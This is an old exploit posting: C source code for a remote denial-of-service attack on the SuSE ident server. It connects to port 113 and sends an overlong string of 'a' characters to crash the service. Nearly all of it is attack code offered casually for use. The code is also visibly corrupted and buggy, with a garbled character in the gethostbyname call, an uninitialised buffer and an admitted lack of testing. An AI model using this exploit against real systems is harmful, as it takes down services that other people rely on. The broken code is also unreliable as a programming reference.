SuSE identd remote denial of service attack - Uses a long sting to set a pointer to NULL.
5428c66fd108f4593af53e80bdb814ea4c560c05eda8deea3e7caaa7e617830e
/* --------------------------------------------------------------------------------------------------------------------------------------
this dosses the SuSe ident server, that it !!! (btw THIS IS NO BUFFER OVERFLOW, the
server just crashed becoz it thinks the string is to long and sets some pointer to NULL, that's
wat make's it crash, adleast that is wat the advisory i read said)
------------------------------------------------------------------------------------------------------------------------
identdDoS.c
--| BOF| -- */
/*
* identdDoS.c
* written by R00T-dude
* based upon an advisory I found on sec-focus
*
* enjoy :)
*
* oh, just in case you think this there is a buffer overflow possible, there ISN'T
* the ident server thinks that the string send is to big so it sets a pointer to NULL
* and that makes it crash !!!!
*
* I tested this at home and it worked fine
* however I an in an inet. cafe right now and this code isn't tested, so if you find mistakes in it
* please don't bitch bout it (thx in advance)
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netdb.h>
#include <string.h>
int main(int argc, char **argv)
{
struct sockaddr_in sin;
struct hostent *hp;
char stuff[1200];
int sock, conn, i ;
if (argc < 2)
{
fprintf(stderr, " useage :: %s 127.0.0.1 ", argv[1]);
exit(0);
}
if ( (hp = gethostbyname§argv[1]) == NULL)
{
fprintf(stderr, "hostname doesn't match !");
exit(0);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
{
fprintf(stderr, "socket() doesn't work !");
exit(sock);
}
sin.sin_family = AF_INET ;
sin.sin_port = htons(113);
sin.sin_addr.s_addr = inet_addr(argv[1]);
conn = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
if (conn < 0)
{
fprintf(stderr, "connect() doesn't work !");
exit(conn);
}
printf("sending stuff... ");
for(i=0; i < 1100; i++)
{
strcat(stuff, "a");
}
send(sock, stuff, sizeof(stuff), 0);
close(sock);
printf("done \n");
}
--| EOF |--
none
____________________________________________________________
Get your own FREE Web and POP E-mail Service in 14 languages at https://www.zzn.com.